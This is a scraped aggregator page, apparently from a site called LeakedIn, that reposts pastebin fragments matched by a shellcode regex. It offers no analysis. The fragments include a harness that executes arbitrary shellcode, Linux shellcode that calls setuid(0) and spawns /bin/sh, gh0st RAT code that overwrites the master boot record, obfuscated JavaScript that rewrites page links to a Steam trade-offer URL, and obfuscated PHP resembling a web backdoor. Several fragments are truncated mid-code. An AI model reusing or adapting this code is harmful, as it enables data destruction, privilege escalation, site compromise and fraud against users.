LeakedIn Logo
Stories About Data Leaks and Related Stuff

Posts Tagged ‘Shellcode’

Shellcode

0 votedvote

Detected 6 occurrence(s) of ‘shellcode’:

CUTE_READWRITE);

	if (sc == NULL)
	{
		cout << "Error: Cannot allocate space for shellcode!" << endl;
		return;
	}

	// Copy shellcode and execute it

	memcpy(sc, p, size);
	(*(int(*)()) sc)();
}


int main(int argc, char *argv[])
{
	TestShellcode(argv[1]);
	return 0;
}

Source: http://pastebin.com/raw.php?i=HeJfjxwg

Shellcode

0 votedvote

Detected 5 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"

"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"

"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"

"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"

"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"

Source: http://pastebin.com/raw.php?i=Un5cB8eZ

Shellcode

0 votedvote

Detected 3 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

81/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):

// CGh0stApp message handlers 
 
unsigned char scode[] = 
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" 
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" 
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 
 
int CGh0stApp::KillMBR() 
{ 
	HANDLE hDevice; 
	DWORD dwBytesWritten, dwBytesReturned; 
	BYTE pMBR[512] = {0}; 
	 
	// ????MBR 
	memcpy(pMBR, scode, sizeof(scode) - 1); 
	pMBR[510] = 0x55; 
	pMBR[511] = 0xAA; 
	 

Source: http://pastebin.com/raw.php?i=87fTTx2H

Shellcode

0 votedvote

Detected 12 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

8\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x65\x61\x6D\x63\x6F\x6D\x6D\x75\x6E\x69\x74\x79\x2E\x63\x6F\x6D\x2F\x74\x72\x61\x64\x65\x6F\x66\x66\x65\x72\x2F\x6E\x65\x77\x2F\x3F\x70\x61\x72\x74\x6E\x65\x72\x3D\x33\x36\x31\x37\x34\x31\x30\x33\x34\x26\x74\x6F\x6B\x65\x6E\x3D\x55\x39\x78\x65\x39\x54\x66\x6B","\x6F\x6E\x63\x6C\x69\x63\x6B","\x5F\x62\x6C\x61\x6E\x6B","\x6F\x70\x65\x6E"];setInterval(function(){var _0x22cex1=document[_0x88f8[1]](_0x88f8[0]);for(i= 0;i< _0x22cex1[_0x88f8[2]];i++){_0x22cex1[i][_0x88f8[3]]= _0x88f8[4];_0x22cex1[

Source: http://pastebin.com/raw.php?i=kjMFmRij

Shellcode

1 votedvote

Detected 8 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

c\x59\x7c\x5f\x6f\x36\x2b\x37\x73\x24\x76\x30\x70\x5b\x4b\x7d\x41\x21\x78\x47\x77\x6b\x4c\x44\x56\x53\x20\x4d\x39\x49\x34\x40\x71\x43\xa\x22\x61\x50\x48\x5e\x27\x5a\x51\x6d\x32\x23\x3e\x33\x55\x6e\x3f\x66\x2e\x7a\x65\x54\x72\x29\x2a\x28\x45\x42\x6a\x4f\x60\x4e\x25\x46\x31\x68\x52\x2c\x26\x3b\x58";
$GLOBALS[$GLOBALS['xc44'][3].$GLOBALS['xc44'][59].$GLOBALS['xc44'][51].$GLOBALS['xc44'][15].$GLOBALS['xc44'][30].$GLOBALS['xc44'][30].$GLOBALS['xc44'][53]] = $GLOBALS['xc44'][7].$GLOBALS['xc44'][92].$GLOBALS['xc44'][79];
$GLOBALS[$GLOBALS['xc44'][41].

Source: http://pastebin.com/raw.php?i=CVYMqnzB